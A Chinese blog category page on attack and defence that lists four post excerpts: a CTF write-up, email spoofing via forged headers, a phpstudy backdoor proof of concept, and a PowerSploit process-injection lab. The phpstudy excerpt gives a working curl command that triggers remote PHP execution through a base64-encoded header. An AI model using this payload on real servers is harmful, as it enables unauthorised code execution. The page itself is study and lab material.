攻防
文章平均质量分 85
KANITAN___
这个作者很懒,什么都没留下…
展开
-
【F2C】NCTF 南邮攻防平台 Write Up
说在前面大部分参考:NCTF 南京邮电大学网络攻防训练平台 WriteUp做题网址:CG-CTF (做得还蛮好的,只是里面时不时出现某同学的名字实在好出戏)里面的解答比较全,不过我有几题没写出来,以后做出来了会更新。 刚接触CTF,很多东西不懂,只是为了做个笔记,比较适合新入门的同胞们看,老鸟们……求指导啊!原创 2019-11-19 15:11:19 · 560 阅读 · 2 评论 -
【F2C】利用邮件头欺骗进行电子邮件伪造
参考地址←备用地址←邮件日志分析邮件伪造方法(telnet)邮件伪造方法(Swaks)received的类型邮件协议和日志详细分析待研究:指定邮箱服务器发送邮件,邮件收件人不存在在该邮箱服务器记录中,邮件会转发到实际收件人或者退信Email传输过程邮件头的变化graph TDA[邮件客户端修改]-->B[转发邮件服务器修改]B-->C[目的服务器修改]阶段1...原创 2019-08-13 17:16:47 · 2072 阅读 · 0 评论 -
【POC】phpstudy官方隐藏后门poc
curl http://localhost/1.php -H 'Accept-Encoding:gzip,deflate' -H 'Accept-Charset:ZWNobyBgaXBjb25maWdgOw==' 可插入任意php代码原创 2019-09-25 15:46:47 · 876 阅读 · 0 评论 -
【EXP】利用powersploit实现进程注入
实验内容实验名称利用powersploit实现进程注入实验环境靶机:windows7,主机名target 攻击机:宿主机:macOS,主机名host 虚拟机:kali,主机名vmhost使用工具:metasploit:制作木马 apache2:提供下载 powersploit:进程注入工具 Parallels Desktop:虚拟机解决问题(1) 将...原创 2019-10-10 09:37:32 · 580 阅读 · 0 评论